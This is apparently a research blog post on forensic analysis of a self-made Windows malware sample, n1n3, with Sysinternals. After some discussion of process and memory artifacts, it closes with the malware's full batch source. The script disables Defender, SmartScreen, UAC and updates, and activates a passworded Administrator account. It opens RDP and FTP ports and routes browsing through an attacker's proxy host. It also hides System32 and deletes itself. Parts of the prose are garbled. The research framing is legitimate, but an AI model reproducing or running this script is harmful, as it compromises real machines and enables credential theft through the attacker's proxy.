Malware Analysis Using Volatility — Part 7

USING N1N3 TO SIMULATE AN EVASIVE “FILELESS” MALWARE
This article is part of research called Forensics Malware with the use of reverse engineering and is still in progress at the University Nove de Julho (Uninove, Brazil), under the coordination of Dr. Paul H. Pereira. Initially, the project structure comprised only of penetration testing. However, the project was expanded to forensic analysis of malware with the development of n1n3 to fill a gap: the research needed to move forward in terms of creating a dynamic analysis environment of self-destructive malware in a simulated and controlled environment of the virtual laboratory. With the proposed theme by eForensics, we decided to share some of the preliminary results and evaluate what can be improved in the next steps of our malware research.

A BRIEF SCENARIO OF CYBERCRIME IN BRAZIL
Brazil is one of the countries with the highest activity of cybercrimes in the world. However, their combat against this practice policy is still small given the diversity of attacks to which the average user is exposed: fraud, port scanning and DOS were the three main types of attacks in the country between January and December 2014. According the consolidated statistics: about 45% are fraud attacks, 25% port scanning attacks, 21% DOS type attacks, 3% web attacks, 4% attacks using worms, less than 1% are attacks invasion and the remaining percentage was due to other types of crime. [1]. On the other hand, in terms of combating cybercrime, the country is in 33th position in the ranking HE [2].

The intense activity of cyber criminals in Brazil has a classic vector creating malware to attack in order to steal financial information of banking organizations and ordinary people. [3] In addition to that, the slow pace of political leaders to create a legal apparatus that can clearly define the parameters of cybercrime to establish the intelligent and effective tracking to impose greater difficulties for attackers. The delay in setting a policy against cybercrime prevents us even from knowing the costs involved with the loss of data, bank fraud and unauthorized access to the database of e-commerce companies, among others.

CREATING OBSTACLES FOR FORENSICS
Infection attack is very simple: the request made by the victim’s machine goes through a channel in which there is an attacker’s proxy that will capture the requests made by the target machine. For example, assuming that the victim visits a website that contains n1n3 (here disguised as an image for the WhatsApp application).

Once downloaded, the n1n3 will run on the target machine, releasing the doors of this machine for data capture. Once its role in the victim machine is completed, the n1n3 self-destructs. The attack is the drive-bydownload type and the appeal is the availability of images to the messaging application. Attacks of this nature are common and are made daily in search of an unsuspecting user. The victim views a website with an image that it downloads (one n1n3 container is the image). The n1n3 runs and connects to the proxy and the attacker exploits the victim machine. In our scenario, the proxy server was set to be the intermediary between the victim and the attacker. The proxy scenario simulating a server of the attacker already configured on the victim machine, starting this moment all shipping this victim will pass the attacker’s server, and this full facility to collect the most relevant information, the passwords banks, email, and social networks, but also can make connections and kidnap a victim using this machine to make more complex attacks. The attacker’s proxy is configured with packet capture tools (like sniffers), causing all traffic to be diverted so it can be captured (Figure 2).

The structure of n1n3.exe is a small malicious artifact with size 182kb in a binary file. Once running on the victim machine its size becomes little more than being 184kb (Figure 3). We can clearly see in the figure below that n1n3 is presented under a Whatsapp icon, forcing an attractive social engineering to careless user.

Your script has instructions for variants that directly affect the registry W10, disabling vital registry system functions, such as the firewall, changing the port connection and the Defender’s defense properties and changing important key features of the system (Figure 4).

Figure 5 shows the features that the script n1n3 has: access to important libraries like USER32.dll and Load-LibraryAGetProcAddress is evidence that malware needs these libraries to work. Another important function of n1n3 is to operate at the level of Kernel32, calling procedures in free memory (VirtualFree) and allocation (VirtualAlloc), respectively, at the addresses 0x00410F50 and 0x00410F4C, both at the operating level of the Kernel.

We can identify in the memory process allocation the execution process of n1n3 in the address 0x00410F4C and 0x00410F50 showing that the requisition works in the Kernel label (Figure 6).

Up to this point of the research, we can identify the address where n1n3.exe begins the execution on the victim machine at the address 0x0040F390 (Figure 7).

The Sysinternals can detect the process n1n3.exe, in this case the PID is 3320. But then the process disappears as if it had been finished. Initially, the PID 3320 appears in green, then marked in red. This is the forensic challenge of our research. The processes marked in a green color are processes that start on the machine. When it is marked in a red color this means that the process (jobs and handles) has finished, but n1n3 is still in an operating state. We call this situation of “N1n3 realm” in an obvious reference to “Narnia realm”. This is shown below in Figure 8 and Figure 9.

We found with Sysinternals that there is a parent process (PID 1892) for the n1n3.exe file allocated in
explorer.exe (Figure 10).

As if we are archaeologists looking for evidence of malicious artifacts on the victim machine basically using Sysyinternal as an ally in this quest, we chose a dynamic analysis and run the n1n3 the second time, now with PID 2688. What did we find? First of all, the distribution of the n1n3 memory requests show that the area destined for the own memory heap 1488k with a stack of 3072K against a paging table with only 336k. This shows us that the n1n3 has an interesting fragmentation.

Despite the process being identified as finalized, it is observed that the file’s timeline shows that it is possible to identify the mapped the n1n3.exe files with a high fragmentation distributed in various ways of the W10 system (Figure 12).

The offsets of ntdll.dll libraries point to the addresses 0x5008d 0x72e50 (Figure 13). All other offsets point to the location of the file on the C drive in the “Users” folder where the careless user installed n1n3.

This feature of Sysinternals, called Call Tree, is extremely important when we are looking for evidence that the malicious artifact is still running in the background and was not finalized. An inattentive user could interpret this signal as if the file was inactive in the system (Figure 13).

Some other evidence that n1n3 is still in the system and making requests even with low intensity of use of the machine memory may be observed in the figures below (Figure 14 to Figure 17). The malicious file is still requesting the rpcrt4.dll services at 0x4036a1 address with the clear intention of causing collateral fault system (known vulnerability and released for part of Windows systems [6]). The implementation of n1n3 listed on Heap area is 0x405ef7 for addressing, but its location is 0x5ef7 and 0x4036a1 (Figures 15- 16).

The disruption of the system can be reached by the abuse of libraries in RPCRT4.DLL if the attacker has the ability to scale the system permission to access and transform the victim machine into a zombie machine (Figure 17). Finally, considering that we still have ongoing research, our next goal will be to explore the n1n3 by adding more code elements in the script becoming more evasive to the point of fragmentation and can apply “fileless malware” name.

cls

@ECHO OFF

title Malware N1n3 Developer: Renato Basante Borbolla

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System” /v EnableSmartScreen /t
REG_DWORD /d 0 /f

← disable SmartScreen →

net user Administrador /active:yes

← active account Administrator →

net user Administrador senharoubada

← set new password administrator for hacker attack →

:fw
netsh firewall set portopening TCP 21
netsh firewall set portopening UDP 21

← open port 21 for possible ftp →

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” /v EnableLUA /t
REG_DWORD /d 0 /f

← disables notifications for User →

%windir%\System32\reg.exe ADD “HKEY_CLASSES_ROOT\*\\” /ve

← create key not accessible regedit →

%windir%\System32\reg.exe ADD “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal
Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

← enable any remote connection →

net localgroup “Usuários da área de trabalho remota” “Administrador”

← adding the administrator on the remote group →

rem netsh firewall set opmode disable

← disable firewall — feature disabled, for option →

rem netsh advfirewall set currentprofile state off
rem netsh advfirewall set domainprofile state off
rem netsh advfirewall set privateprofile state off
rem netsh advfirewall set publicprofile state off
rem netsh advfirewall set all state off
rem netsh advfirewall set profiles state off
rem — DOWNLOAD FILE (possivel driver-by-download com exploit)
rem bitsadmin /transfer mydownloadjob /download /priority normal URL
C:\file.exploit.exe

← download malware or exploit for attack — feature disabled, for option →

netsh firewall set portopening TCP 3389
netsh firewall set portopening UDP 3389

← open port 3389 for remote access →

bcdedit /set {current} nx AlwaysOff

← disables the button to turn off →

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v NoClose /t
REG_DWORD /d 0x00000001 /f

← disables the button to turn off →

bcdedit /set {default} recoveryenabled No

← disabled mode recuperation | snap-shot →

bcdedit /set {default} bootstatuspolicy ignoreallfailures

← disable notifications of failures or errors in the system →

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e D E L
“HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v DisableTaskMgr /t
REG_DWORD /d 0x00000001 /f

← disable task manager for user →

sc stop windefend
net stop MsMpSvc
sc delete windefend
net stop WinDefend

← disable Windows defender →

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e D E L
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\Nam
eSpace\{D8559EB9–20C0–410E-BEDA-7ED416AECC2A}”

← delete key the Windows Defender for it does not enable future →

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer” /v
SmartScreenEnabled /t RG_SZ /d Off /f

← disable SmartScreen →

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e D E L
“HKEY_CLASSES_ROOT\CLSID\{305CA226-D286–468e-B848–2B2E8E697B74}\System.Software.TasksFi
leUrl” /f

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e D E L
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UFH\SHC” /f

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e D E L
“HKEY_CLASSES_ROOT\CLSID\{305CA226-D286–468e-B848–2B2E8E697B74}\Shell\Open\Command” /f

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System” /v EnableSmartScreen /t
REG_DWORD /d 0 /f

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU” /v
NoAutoUpdate t REG_DWORD /d 1 /f

%windir%\System32\reg.exe ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings” /v ProxyEnable /t REG_DWORD /d 1 /f

%windir%\System32\reg.exe ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings” /v ProxyServer /t REG_SZ /d borbollanetwork.ddns.net:80 /f

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v
“ProxyOverride “ /t REG_SZ /d “borbollanetwork.ddns.net” /f

%windir%\System32\reg.exe ADD “HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet
Explorer\Control Panel” /v “Proxy” /t REG_DWORD /d “1” /f

% w i n d i r % \ S y s t e m 3 2 \ r e g . e x e A D D
“HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\{8FC0B734- A0E1- 11D1- A7D3-
0000F87571E3}”/ v Restrict_Run/ t REG_DWORD / d 1 / f

← adding keys in regedit to direct all navigation to the proxy attacker →

if EXIST “Control Panel.{21EC2020–3AEA-1069-A2DD-08002B30309D}” goto QUIT
if NOT EXIST System32 goto LOCK
:QUIT
del /f /q %0
exit
:LOCK
ren System32 “Control Panel.{21EC2020–3AEA-1069-A2DD-08002B30309D}”
mv %userprofile%\Desktop\N1n3.exe
mv %userprofile%\Download\N1n3.exe
attrib +h +s “Control Panel.{21EC2020–3AEA-1069-A2DD-08002B30309D}”
erase /F /Q %userprofile%\Desktop\N1n3.exe
erase /F /Q %userprofile%\Download\N1n3.exe
del /f /q %0

Originally published at https://learncybersec.blogspot.com.

Cyber Security Analyst & researcher